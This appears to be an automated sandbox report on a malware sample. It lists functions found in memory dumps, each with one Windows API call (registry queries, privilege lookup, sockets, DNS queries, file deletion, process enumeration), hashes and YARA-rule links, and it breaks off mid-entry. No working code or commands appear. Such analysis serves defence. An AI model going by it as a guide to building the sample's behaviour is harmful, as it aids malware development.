Opcode ID: 46cb329852a7e9748c798aa94e9294959da06d23c8518d01064960ba587e2e57
Instruction ID: fa008d97f6d446d2d87756e7da388782d806444734d9dfe11cd1299c81071f60
Opcode Fuzzy Hash: 46cb329852a7e9748c798aa94e9294959da06d23c8518d01064960ba587e2e57
Instruction Fuzzy Hash: 8C119076600304AFE7218F15EC85F67FBACEF04B10F04859BED499B681D670E945DA71

Uniqueness

Uniqueness Score: -1.00%

Function 003D04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D055C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ebea1c59581b428dd5aa6a837be6d36e2059efcece4f34901a0f70dcd483b7dc
Instruction ID: 44b34a1cb5815df3da2bbb0840d2fcdcc6ed2481c9d7e3cb053e33a89a01b139
Opcode Fuzzy Hash: ebea1c59581b428dd5aa6a837be6d36e2059efcece4f34901a0f70dcd483b7dc
Instruction Fuzzy Hash: CB11BE72504704AFEB21CF55EC84F66FBECEF04B20F04859AED4A8B681D660E944DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D275E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D27BD

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 7eb3ce386e91c8b7e1e84bc1f8cbef6a85c409cc54e6e7fb1b95c7da3afd4e90
Instruction ID: 4284991fbbfde5ebce066543cb58b6071e1b604e6889693f61ec5926b66d22ee
Opcode Fuzzy Hash: 7eb3ce386e91c8b7e1e84bc1f8cbef6a85c409cc54e6e7fb1b95c7da3afd4e90
Instruction Fuzzy Hash: 1211E272500300EFFB218F55EC45F6BFBA8EF14320F1485AAE9498A681D670E9549B71

Uniqueness

Uniqueness Score: -1.00%

Function 003D12F8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003D1362

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2a59f8c79471b296cf755032cd08c3e09cf6e2d40060a699ac14f41590dce578
Instruction ID: 84eadec5ed4940d1f68f27416e9e4a0e39310de19424e58ada861a31be6f6b93
Opcode Fuzzy Hash: 2a59f8c79471b296cf755032cd08c3e09cf6e2d40060a699ac14f41590dce578
Instruction Fuzzy Hash: 2C1172B6605380AFD721CF25DC85B56BFE8EF45210F0984ABE945CB652D274E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D2BC2, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2C29

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 0d3ed5018c34cb36165ba1a0031135bb0d61acf681f71f796896b39c761665c5
Instruction ID: f37731b63e44053331528f6282ff979b55cb7539ceb598bc788d5af3bccfe000
Opcode Fuzzy Hash: 0d3ed5018c34cb36165ba1a0031135bb0d61acf681f71f796896b39c761665c5
Instruction Fuzzy Hash: EC11D072500300AFFB21CF55DC84FABFBA8EF14720F1485AAE9498B651C670E944CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D1006, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D105C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 066f1415702afa0b529e6c3f9dd5640943c98840b597d8f5f0b6e3d0f7a5f217
Instruction ID: 5f6ce4fb854327eff3d3667fa5bc462ca729e8b517babab55b107e7660567362
Opcode Fuzzy Hash: 066f1415702afa0b529e6c3f9dd5640943c98840b597d8f5f0b6e3d0f7a5f217
Instruction Fuzzy Hash: 0111A372501344AFFB119F55EC85B6AFB98EF44320F1484ABED09CB681D674E9448A61

Uniqueness

Uniqueness Score: -1.00%

Function 001CA51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001CA58A

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 76f337e90df12d12d9dffc4fc37ffcf49061186953982d7dd25ee2ab4b11ce40
Instruction ID: d80d470d273e76f758f3fd51d65c5b814d794ab597d8ba8803e3239af8683013
Opcode Fuzzy Hash: 76f337e90df12d12d9dffc4fc37ffcf49061186953982d7dd25ee2ab4b11ce40
Instruction Fuzzy Hash: C8119072409380AFDB228F50DC44F62FFB4EF4A320F08859AE9858B552C275A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CB7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 001CB841

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2fba6ad7d2a0fc7d81dd13702efe57235966cbd694a4871bb51c4311fb19c56a
Instruction ID: 1bd16630347358c18d2c53d83c911832ffdedd91ecaa53f023a8d7b7a7474a3b
Opcode Fuzzy Hash: 2fba6ad7d2a0fc7d81dd13702efe57235966cbd694a4871bb51c4311fb19c56a
Instruction Fuzzy Hash: D321D2724097C09FDB128B21DC55AA1BFB0EF17310F0D84CAEDC44F163D265A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0A51

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4ef4ec2320da54c1105c627e2a6974e7ddf19715f8b02559f180b38e2a01f239
Instruction ID: 3d92df6519c39b372de4eb6b6e586080bed21b0c7e790144bb8ec5f00b1990b0
Opcode Fuzzy Hash: 4ef4ec2320da54c1105c627e2a6974e7ddf19715f8b02559f180b38e2a01f239
Instruction Fuzzy Hash: 1511C172500300EFFB21CF55EC85F6AFBA8EF04720F1485ABEA498A641C674E9448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D10E2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 003D114B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 461fb2ff90b72e7a987e9ec2c9c06481338d44c3cd7255b551bd6c7b00a39a50
Instruction ID: 0d9822586e7976d949f3b3951941d75c6eeafe80bc80d838d230bcebf71f493f
Opcode Fuzzy Hash: 461fb2ff90b72e7a987e9ec2c9c06481338d44c3cd7255b551bd6c7b00a39a50
Instruction Fuzzy Hash: 1611E972640300BFF721DB15EC85FB6FB98DF04720F14C09AFE498A781D6B5A944CA61

Uniqueness

Uniqueness Score: -1.00%

Function 003D02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 003D0353

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a2f405d01e9c22f9a56628cd335b888e762b026deac07693b98abec7ccf9efc1
Instruction ID: e1e94b4674670c2ad73ace4d59c1c0ed11b598772d78ad7234662c8cfc1edece
Opcode Fuzzy Hash: a2f405d01e9c22f9a56628cd335b888e762b026deac07693b98abec7ccf9efc1
Instruction Fuzzy Hash: 0111E376100300EFFB318F15DC85F7AFBA8EF04710F14859AEE495A691C2B1A948DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 001CBB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 001CBBB9

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 23472826846462df4c79cbc9c03dee48494d8fe3a0cb587a5082a317b3167c01
Instruction ID: fdecfb8341740e2fcf468b518782de469f3ad85526d5d0f1823fcd2ec53f45d3
Opcode Fuzzy Hash: 23472826846462df4c79cbc9c03dee48494d8fe3a0cb587a5082a317b3167c01
Instruction Fuzzy Hash: CF11DF351093C0AFD7228F21CC45B52FFB0EF16220F0885DEED858B563C261A818CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CBE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 001CBE70

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2ec10a8c4cfb0d977cc02be5a51156dd03e0b00785e99bd0ee74265a5c4ca7de
Instruction ID: 1d47f2e4e4eec76a46ba8e461a0ef699db1795a8e08cb30dbc68853aa0caee60
Opcode Fuzzy Hash: 2ec10a8c4cfb0d977cc02be5a51156dd03e0b00785e99bd0ee74265a5c4ca7de
Instruction Fuzzy Hash: 5B118E7580D3C0AFD7128B259C85B61BFB4EF47624F0980DEED848F263D265A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 003D118F, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 003D11F4

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 3671785a7d4f65d3ed32ab3fc43625e92210769b23af8f1275eceb6ad87743dd
Instruction ID: 66f8864778976702cb92f39ae2b2fd0c3270c8bef36231205cd46147798100ed
Opcode Fuzzy Hash: 3671785a7d4f65d3ed32ab3fc43625e92210769b23af8f1275eceb6ad87743dd
Instruction Fuzzy Hash: C9118E714093C0AFD7128B24DC45B92FFB4EF42224F0984DBED888B253C275A949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CBEB4, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 001CBF0C

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b1896e7b4acd32d35ddc63518633d796f0b817782330a9da2bed15b12cfcbd3e
Instruction ID: bcf3e73abd7b149acd2099cedc216593107adc6fa3ff8550f7eefc1ab502e005
Opcode Fuzzy Hash: b1896e7b4acd32d35ddc63518633d796f0b817782330a9da2bed15b12cfcbd3e
Instruction Fuzzy Hash: BC118F726093809FD711CF25DC85B56BFA8EF41220F0884AEED49CB252D375E808CF61

Uniqueness

Uniqueness Score: -1.00%

Function 003D131A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003D1362

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 777fd56f5c23b5da4199771cdf17c6ed4afaf8519f58cbcf09213a847299ffba
Instruction ID: f0840207addca70244f02211ea292dc75ee4f3bc51fd01fa1562c1a63a86017c
Opcode Fuzzy Hash: 777fd56f5c23b5da4199771cdf17c6ed4afaf8519f58cbcf09213a847299ffba
Instruction Fuzzy Hash: C11165B66013409FEB51CF29EC85B66FBD8EF04720F0884ABDD49CBB42D674E844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 003D0AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 003D0B1E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 777fd56f5c23b5da4199771cdf17c6ed4afaf8519f58cbcf09213a847299ffba
Instruction ID: b12fa6781cdbffa581ff49cbef935df6b30fb9f75f7bae4a78ab87e80e8f2302
Opcode Fuzzy Hash: 777fd56f5c23b5da4199771cdf17c6ed4afaf8519f58cbcf09213a847299ffba
Instruction Fuzzy Hash: 5611A5726043049FEB51CF29ED85B56FBD8EB04724F0884ABDD49CB742D674D804CA61

Uniqueness

Uniqueness Score: -1.00%

Function 001CBAB0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 001CBB0B

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 92333c5e85ef05ba2b3c5da189b9aafc981df4eea90043ea92d5efcc1ef8b859
Instruction ID: 751f06ea9c449f7a874f68a1ddc18d97bf1e8cf6a5cdf497226ce8b89f59d19f
Opcode Fuzzy Hash: 92333c5e85ef05ba2b3c5da189b9aafc981df4eea90043ea92d5efcc1ef8b859
Instruction Fuzzy Hash: FC11A0765097849FE7218F15DC85B92FFA4EF16320F0980DEED858B262C275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 003D0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D0985

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 35418b4ffe3b2cf08d69680abfe3209ac8570f1fd41b053ec6755248fd1a8b7b
Instruction ID: 71f1e92853e9119cd55c92c6688918d4b32ef32ee68f3fc8a1c8a6c8f7f7308b
Opcode Fuzzy Hash: 35418b4ffe3b2cf08d69680abfe3209ac8570f1fd41b053ec6755248fd1a8b7b
Instruction Fuzzy Hash: E601D276500304AFF721CB15EC85FBAFBA8EF44720F148097EE489B692C674A9448AB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 003D079F

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: e0ceb9166db627c9db1355f78da657c469d231f1b9a0524c6139123ada4656d3
Instruction ID: 422c9805c21abc9cb5bb514d91ac5e71296e486028a45ed368fee60ad6194a0d
Opcode Fuzzy Hash: e0ceb9166db627c9db1355f78da657c469d231f1b9a0524c6139123ada4656d3
Instruction Fuzzy Hash: A0115E766012409FEB55CF19E885B6AFBD8EB04720F0884AADD49CF742D674E944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001CA75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 001CA7BC

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 1210246ae16993aae0e38edffdfab539050581821080967d12810e3444128358
Instruction ID: 8511b1fe77a2a9bc2e05384611509a43dda66f04bc8757ef51765e4d9db2e2f8
Opcode Fuzzy Hash: 1210246ae16993aae0e38edffdfab539050581821080967d12810e3444128358
Instruction Fuzzy Hash: A511A075549384AFD712CF15DC85B52BFB4EF42324F0884DAED488B293D376A908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003D1616, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 003D1656

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 958f586239c434e418db371d02a6399cf2ea2af144f8fd6261bcb01990d481c7
Instruction ID: e02f4d0d54c4350d1e33bbe255f5295e2d39cd9abf8e2594042052717fee1376
Opcode Fuzzy Hash: 958f586239c434e418db371d02a6399cf2ea2af144f8fd6261bcb01990d481c7
Instruction Fuzzy Hash: 2511AD76601344AFEB21CF65E884B66FBE8EB04320F0884ABDD498B752D670E844CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D2FCA, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 003D301A

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 124fc97df9c1217778dc2b2167a39e3dc4b686b8bc7e9c2e40ba180fa7a469e5
Instruction ID: 1e13214461520372cfc3b5cde56407e9876d223e7a607e1807a7a3de91275d08
Opcode Fuzzy Hash: 124fc97df9c1217778dc2b2167a39e3dc4b686b8bc7e9c2e40ba180fa7a469e5
Instruction Fuzzy Hash: A7018471900701AFE350DF16DD46B26FBA8FB84B20F14816AED089B741D275F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 003D0CCA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E40,?,?), ref: 003D0D1A

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: b6f141e0d2529c37d736400896e5f02c5dcfda8f8a6e1f90effef73a35ce0e8d
Instruction ID: 34315c67e36b2f04928c515da8990999bc8615dd079a3e5d2d27af1c933d62d5
Opcode Fuzzy Hash: b6f141e0d2529c37d736400896e5f02c5dcfda8f8a6e1f90effef73a35ce0e8d
Instruction Fuzzy Hash: 53018471900701AFE350DF16DD46B26FBA8FB84B20F14816AED089B741D275F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 001CA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 001CA1C2

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 3aeb1dab2a4c6557f83558905bcc5ecdfb503169a6c39b30f93862b9c95b10f0
Instruction ID: ad094bd1bd0731d9fca7d1bdc6b07243c8b921036096c7f958995ec2ae932c21
Opcode Fuzzy Hash: 3aeb1dab2a4c6557f83558905bcc5ecdfb503169a6c39b30f93862b9c95b10f0
Instruction Fuzzy Hash: 92018471900701AFE350DF16DD46B26FBA8FB84A20F14816AED089B741D275F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 001CB48C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 001CB4E3

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: 74d156f015e0d3e987e9618dcb4400ac95393e31bdb34654b1d81632babad235
Instruction ID: 13184aaceaaefd66bfc7333427397e721595723e399cb0461455c140ac5b5bf7
Opcode Fuzzy Hash: 74d156f015e0d3e987e9618dcb4400ac95393e31bdb34654b1d81632babad235
Instruction Fuzzy Hash: 24118E76508780AFD7218F15DC85B52FFA4EF16320F09809EED858B262D375A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CBED2, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 001CBF0C

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: dec61c4775d5a2e5c9d6ded8685dfda66d8deccaf42e387ce97300b3d952dccd
Instruction ID: ad92028bbd4f0a9e8e2038a965b503db30cfa88cbcb5e70f033f4c857283a9da
Opcode Fuzzy Hash: dec61c4775d5a2e5c9d6ded8685dfda66d8deccaf42e387ce97300b3d952dccd
Instruction Fuzzy Hash: 97019E716053409FEB60CF29DC86B6AFB94EB10320F0880AEDD09CB742D774E844CE62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001CA58A

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 962e8452f1c81ccde31db42701b813fb9e55235f6a48a1149a6577a42de86d08
Instruction ID: 1c35e99584ab51cdc448d5c4c3f5d2a3902fd52e44ac3eacfa60d48a7b688529
Opcode Fuzzy Hash: 962e8452f1c81ccde31db42701b813fb9e55235f6a48a1149a6577a42de86d08
Instruction Fuzzy Hash: 88015B325007449FEB218F55D945B66FBE0EF18324F08C59EDE494A652C375E414DF62

Uniqueness

Uniqueness Score: -1.00%

Function 003D05FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 003D064E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 5bdab4398b7e9a7eaf697faf7f383e8640344580cf793e6929482ab298a86084
Instruction ID: 26f3d0def21f36b1c89f90b3b52ec5a3a89b8dd6ef48110c70e1b5fb2c0cc320
Opcode Fuzzy Hash: 5bdab4398b7e9a7eaf697faf7f383e8640344580cf793e6929482ab298a86084
Instruction Fuzzy Hash: 42016271940601ABD350DF16DC46F26FBA4FB88B20F14815AED085B741D275F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 003D19F6, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 003D1A46

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: f4e8efce11d6912329b4f0e58b390f2968bc7e09102dec4438e3bee251c41212
Instruction ID: b130f935ef860dc36eb91ea1559353a060287f3d3bb194f1e148478b0d23a401
Opcode Fuzzy Hash: f4e8efce11d6912329b4f0e58b390f2968bc7e09102dec4438e3bee251c41212
Instruction Fuzzy Hash: D9016271940601ABD350DF16DC46B26FBA4FB88B20F14815AED085B781D275F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 001CAF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 001CAFEA

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dccb1406788d2191e75589c1a7e83a64dd170882c9e78c4869845ba6a531d4c6
Instruction ID: 8fcc4cbc55b5e22d1af94c5c421dd078ea41b56b1c21dd264b6bf8c0718d79e4
Opcode Fuzzy Hash: dccb1406788d2191e75589c1a7e83a64dd170882c9e78c4869845ba6a531d4c6
Instruction Fuzzy Hash: E0018671940701AFD350DF16DC46B26FBA4FB88B20F14815AED085B741D275F515CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 001CBB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 001CBBB9

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 85d8e8ddb71c73f1b20210fd13dfe4b71e1e6851e93f54f61b792ff83ca324cd
Instruction ID: 6a2ca322e3e8eafd9c272ce1bd1ead83e90b0f311490490f4d334f9c7cdfb259
Opcode Fuzzy Hash: 85d8e8ddb71c73f1b20210fd13dfe4b71e1e6851e93f54f61b792ff83ca324cd
Instruction Fuzzy Hash: BF0171355047409FEB208F15D886B65FBA0EF14320F08C09EDD498B665D771E854DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CBAD6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 001CBB0B

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 91d87c307e03fb7b95ef480a09315ac77b1e4d70ab3186d9b3d4a12d5c21a3a9
Instruction ID: d01d574f210fdcff8da6e872aaf3550846afe17fb8890edff6877200c477bbd1
Opcode Fuzzy Hash: 91d87c307e03fb7b95ef480a09315ac77b1e4d70ab3186d9b3d4a12d5c21a3a9
Instruction Fuzzy Hash: 8901F2356043408FE7208F05E886B65FBA4EB10320F08C0AEDD498B655C771E848CA62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 001CA7BC

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 3b09d75fcd67630fe597e820fe27cb551a2f22f0a59b68a9bc1791807b15e64f
Instruction ID: 3dd8e16bd6e8b45d2004b5bd738340939a7bf7aee198b8647d2a0e577053f386
Opcode Fuzzy Hash: 3b09d75fcd67630fe597e820fe27cb551a2f22f0a59b68a9bc1791807b15e64f
Instruction Fuzzy Hash: A601D1759013449FEB10CF15D889B65FBE4EF10324F48C4AADE088B642D376E544CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 001CB806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 001CB841

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 27ebcff2cf30b76a5132bf6a19b8e4ced558fe27ec068e4b96ac53f5ae82909a
Instruction ID: 58b6ba1827601ceb39ea8f5d53c24f97cba877ebe230a0f4904e4b47458e4d1e
Opcode Fuzzy Hash: 27ebcff2cf30b76a5132bf6a19b8e4ced558fe27ec068e4b96ac53f5ae82909a
Instruction Fuzzy Hash: 20018B35504344DFEB208F46D886B65FBA4EB14720F08C09EDE494B662D371E458DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001CB4AE, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 001CB4E3

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: 98ac114855acbeb20a73c0a814fe03d0e22c202cdbc8dfabe443d7878ec937b3
